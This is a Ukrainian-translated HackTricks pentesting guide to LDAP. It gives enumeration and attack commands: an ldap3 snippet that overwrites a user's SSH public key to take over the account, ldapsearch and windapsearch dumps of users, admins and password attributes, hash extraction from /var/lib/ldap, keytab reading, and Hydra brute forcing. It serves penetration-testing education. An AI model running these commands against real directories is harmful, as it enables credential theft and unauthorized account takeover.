Ukranian - Ht
HackTricks Training Twitter Linkedin Sponsor

389, 636, 3268, 3269 - Pentesting LDAP

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Використання LDAP (протокол доступу до легкого каталогу) передбачено переважно для пошуку різних сутностей, таких як організації, особи та ресурси, такі як файли та пристрої в мережах, як публічних, так і приватних. Він пропонує спрощений підхід порівняно з його попередником, DAP, за рахунок меншого обсягу коду.

Каталоги LDAP структуровані таким чином, щоб їх можна було розподілити по кількох серверах, при цьому кожен сервер містить репліковану та синхронізовану версію каталогу, яку називають Агентом системи каталогів (DSA). Відповідальність за обробку запитів повністю лежить на сервері LDAP, який може спілкуватися з іншими DSA за необхідності, щоб надати єдину відповідь запитувачеві.

Організація каталогу LDAP нагадує ієрархію дерева, починаючи з кореневого каталогу у верхній частині. Це розгалужується до країн, які поділяються на організації, а потім на організаційні одиниці, що представляють різні відділи або відділи, нарешті досягаючи рівня окремих сутностей, включаючи як людей, так і спільні ресурси, такі як файли та принтери.

Порт за замовчуванням: 389 та 636 (ldaps). Глобальний каталог (LDAP в ActiveDirectory) доступний за замовчуванням на портах 3268 та 3269 для LDAPS.

PORT    STATE SERVICE REASON
389/tcp open  ldap    syn-ack
636/tcp open  tcpwrapped

Формат обміну даними LDAP

LDIF (LDAP Data Interchange Format) визначає вміст каталогу як набір записів. Він також може представляти запити на оновлення (Додати, Змінити, Видалити, Перейменувати).

dn: dc=local
dc: local
objectClass: dcObject

dn: dc=moneycorp,dc=local
dc: moneycorp
objectClass: dcObject
objectClass: organization

dn ou=it,dc=moneycorp,dc=local
objectClass: organizationalUnit
ou: dev

dn: ou=marketing,dc=moneycorp,dc=local
objectClass: organizationalUnit
Ou: sales

dn: cn= ,ou= ,dc=moneycorp,dc=local
objectClass: personalData
cn:
sn:
gn:
uid:
ou:
mail: pepe@hacktricks.xyz
phone: 23627387495

  • Рядки 1-3 визначають домен верхнього рівня local

  • Рядки 5-8 визначають домен першого рівня moneycorp (moneycorp.local)

  • Рядки 10-16 визначають 2 організаційні одиниці: dev та sales

  • Рядки 18-26 створюють об'єкт домену та присвоюють атрибути зі значеннями

Записати дані

Зверніть увагу, що якщо ви можете змінювати значення, ви зможете виконувати дуже цікаві дії. Наприклад, уявіть, що ви можете змінити інформацію "sshPublicKey" вашого користувача або будь-якого іншого користувача. Ймовірно, якщо цей атрибут існує, то ssh читає публічні ключі з LDAP. Якщо ви можете змінити публічний ключ користувача, ви зможете увійти як цей користувач навіть якщо аутентифікація за паролем не увімкнена в ssh.

# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/
>>> import ldap3
>>> server = ldap3.Server('x.x.x.x', port =636, use_ssl = True)
>>> connection = ldap3.Connection(server, 'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN', 'PASSWORD', auto_bind=True)
>>> connection.bind()
True
>>> connection.extend.standard.who_am_i()
u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'
>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})

Підслуховування облікових даних у чистому тексті

Якщо LDAP використовується без SSL, ви можете підслуховувати облікові дані у чистому тексті в мережі.

Також ви можете виконати атаку MITM в мережі між сервером LDAP та клієнтом. Тут ви можете здійснити атаку на зниження рівня так, щоб клієнт використовував облікові дані у чистому тексті для входу.

Якщо використовується SSL, ви можете спробувати виконати MITM, як зазначено вище, але пропонуючи фальшивий сертифікат, якщо користувач його приймає, ви зможете знизити метод аутентифікації та знову побачити облікові дані.

Анонімний доступ

Обхід перевірки TLS SNI

Згідно з цим описом, просто звернувшись до сервера LDAP з довільним доменним ім'ям (наприклад, company.com), він зміг зв'язатися з службою LDAP та видобути інформацію як анонімний користувач:

ldapsearch -H ldaps://company.com:636/ -x -s base -b '' "(objectClass=*)" "*" +

Анонімні зв'язки LDAP

Анонімні зв'язки LDAP дозволяють неавтентифікованим атакувальникам отримувати інформацію з домену, таку як повний перелік користувачів, груп, комп'ютерів, атрибути облікових записів користувачів та політика паролів домену. Це є устарілою конфігурацією, і починаючи з Windows Server 2003, тільки аутентифікованим користувачам дозволяється ініціювати запити LDAP. Однак адміністратори можуть потребувати налаштувати певну програму для дозволу анонімних зв'язків та надати більше доступу, ніж передбачалося, тим самим надаючи неавтентифікованим користувачам доступ до всіх об'єктів у AD.

Дійсні облікові дані

Якщо у вас є дійсні облікові дані для входу на сервер LDAP, ви можете витягнути всю інформацію про адміністратора домену за допомогою:

ldapdomaindump

pip3 install ldapdomaindump
ldapdomaindump <IP> [-r <IP>] -u '<domain>\<username>' -p '<password>' [--authtype SIMPLE] --no-json --no-grep [-o /path/dir]

Brute Force

Перелік

Автоматизований

За допомогою цього ви зможете побачити публічну інформацію (наприклад, доменне ім'я):

nmap -n -sV --script "ldap* and not brute" <IP> #Using anonymous credentials

Python

Перегляньте перерахування LDAP за допомогою Python

Можна спробувати перерахувати LDAP з або без облікових даних, використовуючи Python: pip3 install ldap3

Спочатку спробуйте підключитися без облікових даних:

>>> import ldap3
>>> server = ldap3.Server('x.X.x.X', get_info = ldap3.ALL, port =636, use_ssl = True)
>>> connection = ldap3.Connection(server)
>>> connection.bind()
True
>>> server.info

Якщо відповідь є True, як у попередньому прикладі, ви можете отримати деякі цікаві дані LDAP (такі як контекст імен або ім'я домену) сервера з:

>>> server.info
DSA info (from DSE):
Supported LDAP versions: 3
Naming contexts:
dc=DOMAIN,dc=DOMAIN

Після отримання контексту імені ви можете виконати додаткові запити. Цей простий запит покаже вам всі об'єкти в каталозі:

>>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=*))', search_scope='SUBTREE', attributes='*')
True
>> connection.entries

Або вивантажте весь ldap:

>> connection.search(search_base='DC=DOMAIN,DC=DOMAIN', search_filter='(&(objectClass=person))', search_scope='SUBTREE', attributes='userPassword')
True
>>> connection.entries

windapsearch

Windapsearch - це сценарій на Python, який корисний для переліку користувачів, груп та комп'ютерів з домену Windows, використовуючи запити LDAP.

# Get computers
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --computers
# Get groups
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --groups
# Get users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Domain Admins
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --da
# Get Privileged Users
python3 windapsearch.py --dc-ip 10.10.10.10 -u john@domain.local -p password --privileged-users

ldapsearch

Перевірте нульові облікові дані або чи ваші облікові дані є дійсними:

ldapsearch -x -H ldap://<IP> -D '' -w '' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
# CREDENTIALS NOT VALID RESPONSE
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A4C, comment: In order to perform this opera
tion a successful bind must be completed on the connection., data 0, v3839

Якщо ви знаходите щось, що говорить, що "bind must be completed", це означає, що облікові дані невірні.

Ви можете витягти все з домену використовуючи:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "DC=<1_SUBDOMAIN>,DC=<TLD>"
-x Simple Authentication
-H LDAP Server
-D My User
-w My password
-b Base site, all data from here will be given

Отримання користувачів:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"
#Example: ldapsearch -x -H ldap://<IP> -D 'MYDOM\john' -w 'johnpassw' -b "CN=Users,DC=mydom,DC=local"

Витягніть комп'ютери:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Computers,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягніть мою інформацію:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=<MY NAME>,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягніть Domain Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Отримати Користувачів домену:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Domain Users,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягніть Enterprise Admins:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Enterprise Admins,CN=Users,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягніть Адміністраторів:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Administrators,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Витягнути Групу віддаленого робочого столу:

ldapsearch -x -H ldap://<IP> -D '<DOMAIN>\<username>' -w '<password>' -b "CN=Remote Desktop Users,CN=Builtin,DC=<1_SUBDOMAIN>,DC=<TLD>"

Щоб перевірити, чи у вас є доступ до будь-якого пароля, ви можете використовувати grep після виконання одного з запитів:

<ldapsearchcmd...> | grep -i -A2 -B2 "userpas"

pbis

Ви можете завантажити pbis звідси: https://github.com/BeyondTrust/pbis-open/ і зазвичай він встановлюється в /opt/pbis. Pbis дозволяє легко отримати базову інформацію:

#Read keytab file
./klist -k /etc/krb5.keytab

#Get known domains info
./get-status
./lsa get-status

#Get basic metrics
./get-metrics
./lsa get-metrics

#Get users
./enum-users
./lsa enum-users

#Get groups
./enum-groups
./lsa enum-groups

#Get all kind of objects
./enum-objects
./lsa enum-objects

#Get groups of a user
./list-groups-for-user <username>
./lsa list-groups-for-user <username>
#Get groups of each user
./enum-users | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do ./list-groups-for-user "$name"; echo -e "========================\n"; done

#Get users of a group
./enum-members --by-name "domain admins"
./lsa enum-members --by-name "domain admins"
#Get users of each group
./enum-groups | grep "Name:" | sed -e "s,\\\,\\\\\\\,g" | awk '{print $2}' | while read name; do echo "$name"; ./enum-members --by-name "$name"; echo -e "========================\n"; done

#Get description of each user
./adtool -a search-user --name CN="*" --keytab=/etc/krb5.keytab -n <Username> | grep "CN" | while read line; do
echo "$line";
./adtool --keytab=/etc/krb5.keytab -n <username> -a lookup-object --dn="$line" --attr "description";
echo "======================"
done

Графічний інтерфейс

Apache Directory

Завантажте Apache Directory звідси. Ви можете знайти приклад використання цього інструменту тут.

jxplorer

Ви можете завантажити графічний інтерфейс з LDAP-сервером тут: http://www.jxplorer.org/downloads/users.html

За замовчуванням встановлюється в: /opt/jxplorer

Godap

Ви можете отримати доступ до нього за посиланням https://github.com/Macmod/godap

Аутентифікація через kerberos

Використовуючи ldapsearch ви можете аутентифікуватися через kerberos замість NTLM, використовуючи параметр -Y GSSAPI

POST

Якщо у вас є доступ до файлів, де зберігаються бази даних (може бути в /var/lib/ldap). Ви можете витягти хеші, використовуючи:

cat /var/lib/ldap/*.bdb | grep -i -a -E -o "description.*" | sort | uniq -u

Конфігураційні файли

  • Загальне

  • containers.ldif

  • ldap.cfg

  • ldap.conf

  • ldap.xml

  • ldap-config.xml

  • ldap-realm.xml

  • slapd.conf

  • Сервер IBM SecureWay V3

  • V3.sas.oc

  • Сервер Microsoft Active Directory

  • msadClassesAttrs.ldif

  • Сервер каталогів Netscape Directory Server 4

  • nsslapd.sas_at.conf

  • nsslapd.sas_oc.conf

  • Сервер каталогів OpenLDAP

  • slapd.sas_at.conf

  • slapd.sas_oc.conf

  • Сервер каталогів Sun ONE Directory Server 5.1

  • 75sas.ldif

Protocol_Name: LDAP    #Protocol Abbreviation if there is one.
Port_Number:  389,636     #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol         #Protocol Abbreviation Spelled out

Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.

https://book.hacktricks.xyz/pentesting/pentesting-ldap

Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}

Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x

Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts

Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"

Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Previous264 - Pentesting Check Point FireWall-1Next500/udp - Pentesting IPsec/IKE VPN

Last updated